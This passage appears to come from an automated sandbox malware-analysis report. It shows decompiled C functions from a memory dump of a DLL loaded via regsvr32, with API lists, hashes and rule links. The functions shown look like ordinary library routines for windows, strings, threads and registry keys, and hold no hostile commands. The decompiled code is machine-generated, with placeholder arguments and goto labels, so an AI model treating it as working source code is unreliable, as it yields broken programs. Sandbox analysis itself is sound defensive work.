                                                                                                            • TlsGetValue.KERNEL32(1004EFF4,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037760
                                                                                                            • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD), ref: 100377BC
                                                                                                            • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4), ref: 100377CE
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 100377DB
                                                                                                            • TlsSetValue.KERNEL32(1004EFF4,00000000), ref: 1003780B
                                                                                                            • LeaveCriticalSection.KERNEL32(1004F010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 1003782C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                                                            • String ID:
                                                                                                            • API String ID: 784703316-0
                                                                                                            • Opcode ID: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                                                            • Instruction ID: 1d31c533a979c77301d76d8eb0d2db078f0d9c8120d6b2d843174624ed3e927a
                                                                                                            • Opcode Fuzzy Hash: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                                                            • Instruction Fuzzy Hash: F8317C75600615AFD726DF59C8C8C5ABBE5FF08352B11C929E81ADB611CB30FC50CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000F6EA Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E1000F6EA(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E100220EE(_t45, GetTopWindow( *(_t45 + 0x1c)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E100203CE(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1000F6EA(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E100220EE(_t44, GetWindow( *(_t41 + 0x1c), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1000F695(_t45, E100220EE(_t45, GetParent( *(_t41 + 0x1c))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
						continue;
					}
				}
				_t42 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
				goto L7;
			}












                                                                                                            0x1000f6ea
                                                                                                            0x1000f6ea
                                                                                                            0x1000f6ec
                                                                                                            0x1000f6f3
                                                                                                            0x1000f793
                                                                                                            0x1000f797
                                                                                                            0x1000f7a6
                                                                                                            0x1000f7aa
                                                                                                            0x1000f755
                                                                                                            0x1000f765
                                                                                                            0x1000f7bc
                                                                                                            0x00000000
                                                                                                            0x1000f7bc
                                                                                                            0x1000f767
                                                                                                            0x1000f768
                                                                                                            0x1000f76f
                                                                                                            0x1000f781
                                                                                                            0x1000f7b0
                                                                                                            0x1000f7b0
                                                                                                            0x1000f7b1
                                                                                                            0x1000f7b3
                                                                                                            0x00000000
                                                                                                            0x1000f7b3
                                                                                                            0x1000f783
                                                                                                            0x1000f78c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000f78e
                                                                                                            0x1000f78e
                                                                                                            0x1000f78e
                                                                                                            0x1000f78f
                                                                                                            0x1000f790
                                                                                                            0x1000f7b4
                                                                                                            0x1000f7b9
                                                                                                            0x00000000
                                                                                                            0x1000f7bb
                                                                                                            0x1000f76f
                                                                                                            0x00000000
                                                                                                            0x1000f7ac
                                                                                                            0x1000f708
                                                                                                            0x1000f70d
                                                                                                            0x1000f741
                                                                                                            0x1000f729
                                                                                                            0x1000f72d
                                                                                                            0x00000000
                                                                                                            0x1000f733
                                                                                                            0x1000f73c
                                                                                                            0x00000000
                                                                                                            0x1000f73c
                                                                                                            0x1000f72d
                                                                                                            0x1000f753
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParentVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 506644340-0
                                                                                                            • Opcode ID: e05f7d3be3f5bc05d13bf1b8876ce0f3ed84c428b3ff9c55c238cc21a07b9566
                                                                                                            • Instruction ID: 9ff0abfdc9ec089c08616602c8c252ca1eec58daf7253e76d9435a222983167d
                                                                                                            • Opcode Fuzzy Hash: e05f7d3be3f5bc05d13bf1b8876ce0f3ed84c428b3ff9c55c238cc21a07b9566
                                                                                                            • Instruction Fuzzy Hash: 2B21C1366087286FE732EEA19C49F2B769CEF406D0F02491CF845E7596C760EC01D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10024AA1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10024AA1(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				CHAR* _t21;
				CHAR* _t22;
				int _t31;
				CHAR* _t33;
				intOrPtr _t35;
				CHAR* _t40;
				void* _t44;
				void* _t47;

				_t40 = _a4;
				_t31 = lstrlenA(_t40);
				_t21 = E10038481(_t40, 0, 0) - 1;
				_t44 = _t31 - _t21;
				_t35 = _t44 + _t40;
				_a4 = _t21;
				_v8 = _t35;
				if(_a8 < _t31) {
					if(_a8 >= _t21) {
						_t33 =  &(_t40[2]);
						if( *_t40 == 0x5c && _t40[1] == 0x5c) {
							while( *_t33 != 0x5c) {
								_t33 = E100127D1(_t33);
							}
						}
						if(_t44 > 3) {
							do {
								_t33 = E100127D1(_t33);
							} while ( *_t33 != 0x5c);
						}
						_t22 = _a4;
						_t47 = _t33 - _t40;
						_t12 =  &(_t22[5]); // 0x5
						if(_a8 >= _t47 + _t12) {
							while(lstrlenA(_t33) + _t47 + 4 > _a8) {
								do {
									_t33 = E100127D1(_t33);
								} while ( *_t33 != 0x5c);
							}
							 *((char*)(_t47 + _t40)) = 0;
							lstrcatA(_t40, "\\...");
							_t21 = lstrcatA(_t40, _t33);
						} else {
							_push(_v8);
							goto L14;
						}
					} else {
						if(_a12 == 0) {
							_t35 = 0x1003da51;
						}
						_push(_t35);
						L14:
						_t21 = lstrcpyA(_t40, ??);
					}
				}
				return _t21;
			}












                                                                                                            0x10024aa8
                                                                                                            0x10024ab7
                                                                                                            0x10024abe
                                                                                                            0x10024ac1
                                                                                                            0x10024ac6
                                                                                                            0x10024ac9
                                                                                                            0x10024acc
                                                                                                            0x10024acf
                                                                                                            0x10024ad8
                                                                                                            0x10024aeb
                                                                                                            0x10024aee
                                                                                                            0x10024b01
                                                                                                            0x10024aff
                                                                                                            0x10024aff
                                                                                                            0x10024b01
                                                                                                            0x10024b09
                                                                                                            0x10024b0b
                                                                                                            0x10024b11
                                                                                                            0x10024b16
                                                                                                            0x10024b0b
                                                                                                            0x10024b19
                                                                                                            0x10024b1e
                                                                                                            0x10024b20
                                                                                                            0x10024b27
                                                                                                            0x10024b43
                                                                                                            0x10024b35
                                                                                                            0x10024b3b
                                                                                                            0x10024b40
                                                                                                            0x10024b35
                                                                                                            0x10024b58
                                                                                                            0x10024b63
                                                                                                            0x10024b67
                                                                                                            0x10024b29
                                                                                                            0x10024b29
                                                                                                            0x00000000
                                                                                                            0x10024b29
                                                                                                            0x10024ada
                                                                                                            0x10024ade
                                                                                                            0x10024ae0
                                                                                                            0x10024ae0
                                                                                                            0x10024ae5
                                                                                                            0x10024b2c
                                                                                                            0x10024b2d
                                                                                                            0x10024b2d
                                                                                                            0x10024ad8
                                                                                                            0x10024b6d

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                                                              • Part of subcall function 10038481: PathFindFileNameA.SHLWAPI(?,10024ABE,?,00000000,00000000), ref: 10038485
                                                                                                              • Part of subcall function 10038481: lstrlenA.KERNEL32(00000000), ref: 10038493
                                                                                                            • lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 10024B44
                                                                                                            • lstrcatA.KERNEL32(?,\...), ref: 10024B63
                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 10024B67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$lstrcat$FileFindNamePathlstrcpy
                                                                                                            • String ID: \...
                                                                                                            • API String ID: 1604900594-1167917071
                                                                                                            • Opcode ID: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                                                            • Instruction ID: ad9d98bbfb168da91c5fc0e9dd0c54a6fb05e1c2565fcdf0eb8a60c119eae97e
                                                                                                            • Opcode Fuzzy Hash: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                                                            • Instruction Fuzzy Hash: 7D21E57590075AAEEB22CB70ACC4F5B7BF8DB05296F52805EE9059B042EB74E940CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100304C6 Relevance: 10.6, APIs: 7, Instructions: 69windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 61%
                                                                                                            			E100304C6(void* __ecx) {
				struct tagMSG _v28;
				void* __ebp;
				int _t21;
				intOrPtr _t24;
				intOrPtr _t33;
				void* _t38;
				void* _t39;
				int _t40;

				_push(0);
				_t39 = __ecx;
				_t40 = 0xf;
				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
					if(_t21 != 0) {
						DispatchMessageA( &_v28);
						_push(0);
						continue;
					}
					return _t21;
				}
				_t24 =  *((intOrPtr*)(_t39 + 0x68));
				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x80));
				 *(_t39 + 0x78) =  *(_t24 + 0x7c) & 0x0000f000;
				SetRectEmpty(_t39 + 0xc);
				 *((intOrPtr*)(_t39 + 0x20)) = 0;
				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
				 *((intOrPtr*)(_t39 + 0x24)) = 0;
				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
				 *((intOrPtr*)(_t39 + 0x80)) = 0;
				_t38 = E100220EE(_t40, GetDesktopWindow());
				if(LockWindowUpdate( *(_t38 + 0x1c)) == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(GetDCEx( *(_t38 + 0x1c), 0, ??));
				_t33 = E10029068();
				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
				return _t33;
			}











                                                                                                            0x100304d5
                                                                                                            0x100304d8
                                                                                                            0x100304da
                                                                                                            0x100304ff
                                                                                                            0x100304e5
                                                                                                            0x100304ed
                                                                                                            0x100304f8
                                                                                                            0x100304fe
                                                                                                            0x00000000
                                                                                                            0x100304fe
                                                                                                            0x10030581
                                                                                                            0x10030581
                                                                                                            0x1003050d
                                                                                                            0x10030516
                                                                                                            0x10030521
                                                                                                            0x10030528
                                                                                                            0x1003052e
                                                                                                            0x10030531
                                                                                                            0x10030534
                                                                                                            0x10030537
                                                                                                            0x1003053a
                                                                                                            0x1003054c
                                                                                                            0x10030559
                                                                                                            0x10030562
                                                                                                            0x1003055b
                                                                                                            0x1003055b
                                                                                                            0x1003055b
                                                                                                            0x1003056e
                                                                                                            0x1003056f
                                                                                                            0x10030574
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetMessageA.USER32 ref: 100304E5
                                                                                                            • DispatchMessageA.USER32 ref: 100304F8
                                                                                                            • PeekMessageA.USER32(0000000F,00000000,0000000F,0000000F,00000000), ref: 10030507
                                                                                                            • SetRectEmpty.USER32(?), ref: 10030528
                                                                                                            • GetDesktopWindow.USER32 ref: 10030540
                                                                                                            • LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                                                            • GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1192691108-0
                                                                                                            • Opcode ID: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                                                            • Instruction ID: 8a91eee366d4ec1ad94f649a4fc85a3a9efab89b356857822c8a99d212f9e85e
                                                                                                            • Opcode Fuzzy Hash: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                                                            • Instruction Fuzzy Hash: 39215EB2500B09AFE311DF66DC84E57BBECFB04251F41492EF655CA511D735E9448F60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100358C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100358C8(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                                                                                                            0x100358e3
                                                                                                            0x100358ea
                                                                                                            0x100358ed
                                                                                                            0x100358f0
                                                                                                            0x100358f3
                                                                                                            0x100358fe
                                                                                                            0x10035935
                                                                                                            0x10035935
                                                                                                            0x10035940
                                                                                                            0x10035945
                                                                                                            0x10035945
                                                                                                            0x1003594a
                                                                                                            0x1003594f
                                                                                                            0x1003594f
                                                                                                            0x10035958

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreate$Open
                                                                                                            • String ID: software
                                                                                                            • API String ID: 1740278721-2010147023
                                                                                                            • Opcode ID: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                                                            • Instruction ID: f89c3a735d8d1ef68568a63ef4ea0061cb5f0d4f5e3c764e69df4fb83dc90cc3
                                                                                                            • Opcode Fuzzy Hash: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                                                            • Instruction Fuzzy Hash: BF11B37690029DFFDB12DB9ACD88DDFBFBCEF89755F1040AAE500A6121D2719A00DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10007B50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E10007B50(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;

				if(E1000799F() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x1004ee08(_a4, _a8);
			}







                                                                                                            0x10007b5d
                                                                                                            0x10007b76
                                                                                                            0x10007bdd
                                                                                                            0x10007bdd
                                                                                                            0x10007bdf
                                                                                                            0x00000000
                                                                                                            0x10007be0
                                                                                                            0x10007b78
                                                                                                            0x10007b7f
                                                                                                            0x00000000
                                                                                                            0x10007b98
                                                                                                            0x10007b99
                                                                                                            0x10007b9c
                                                                                                            0x10007baa
                                                                                                            0x10007bad
                                                                                                            0x10007bb5
                                                                                                            0x10007bb6
                                                                                                            0x10007bb7
                                                                                                            0x10007bb8
                                                                                                            0x10007bbf
                                                                                                            0x10007bc2
                                                                                                            0x10007bc6
                                                                                                            0x10007bd3
                                                                                                            0x10007bd3
                                                                                                            0x10007bd9
                                                                                                            0x00000000
                                                                                                            0x10007bd9
                                                                                                            0x10007b7f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10007B8E
                                                                                                            • GetSystemMetrics.USER32 ref: 10007BA6
                                                                                                            • GetSystemMetrics.USER32 ref: 10007BAD
                                                                                                            • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 10007BD3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                                                            • String ID: B$DISPLAY
                                                                                                            • API String ID: 2307409384-3316187204
                                                                                                            • Opcode ID: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                                                            • Instruction ID: f9e3eb19a9beaf27ca7ac5b5242ad86db65a0bc6b8874f4885458b15db7551ae
                                                                                                            • Opcode Fuzzy Hash: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                                                            • Instruction Fuzzy Hash: B6117771A012399FEB12DF658C84B5B7BA8FF05791B118466FD09AE109D374DD40CBD0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10020D81 Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 10020D8D
                                                                                                            • GetWindowRect.USER32 ref: 10020DA8
                                                                                                            • ScreenToClient.USER32 ref: 10020DBB
                                                                                                            • ScreenToClient.USER32 ref: 10020DC4
                                                                                                            • EqualRect.USER32 ref: 10020DCE
                                                                                                            • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10020DF6
                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10020E00
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                            • String ID:
                                                                                                            • API String ID: 443303494-0
                                                                                                            • Opcode ID: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                                                            • Instruction ID: 0a58a577598c21a1846f40493314dc2d021d714bbb101a3e6ae2e9ccd4581a15
                                                                                                            • Opcode Fuzzy Hash: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                                                            • Instruction Fuzzy Hash: C1113D7650021AAFDB01DFA5DC84EBBBBBEEF84310B118419F916E7112D770A940CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001519D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37threadCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 41%
                                                                                                            			E1001519D(void* __edi) {
				void* __ebx;
				void* __esi;
				long _t5;
				long _t11;
				long _t12;
				long* _t17;

				_t5 = GetLastError();
				_t12 = _t5;
				_t17 =  *0x1004f5e0( *0x1004c848);
				_t18 = _t17;
				if(_t17 == 0) {
					_push(0x8c);
					_push(1);
					_t17 = E1001382A(_t12, __edi, _t17, _t18);
					if(_t17 == 0) {
						L4:
						E10011400(0x10);
					} else {
						_push(_t17);
						_push( *0x1004c848);
						if( *0x1004f5e4() == 0) {
							goto L4;
						} else {
							_t17[0x15] = 0x1004cb00;
							_t17[5] = 1;
							_t11 = GetCurrentThreadId();
							_t17[1] = _t17[1] | 0xffffffff;
							 *_t17 = _t11;
						}
					}
				}
				SetLastError(_t12);
				return _t17;
			}









                                                                                                            0x1001519f
                                                                                                            0x100151ab
                                                                                                            0x100151b3
                                                                                                            0x100151b5
                                                                                                            0x100151b7
                                                                                                            0x100151b9
                                                                                                            0x100151be
                                                                                                            0x100151c5
                                                                                                            0x100151cb
                                                                                                            0x100151fa
                                                                                                            0x100151fc
                                                                                                            0x100151cd
                                                                                                            0x100151cd
                                                                                                            0x100151ce
                                                                                                            0x100151dc
                                                                                                            0x00000000
                                                                                                            0x100151de
                                                                                                            0x100151de
                                                                                                            0x100151e5
                                                                                                            0x100151ec
                                                                                                            0x100151f2
                                                                                                            0x100151f6
                                                                                                            0x100151f6
                                                                                                            0x100151dc
                                                                                                            0x100151cb
                                                                                                            0x10015203
                                                                                                            0x1001520d

                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                                                            • FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                                                            • SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                                                              • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                                                              • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                                                            • FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100151EC
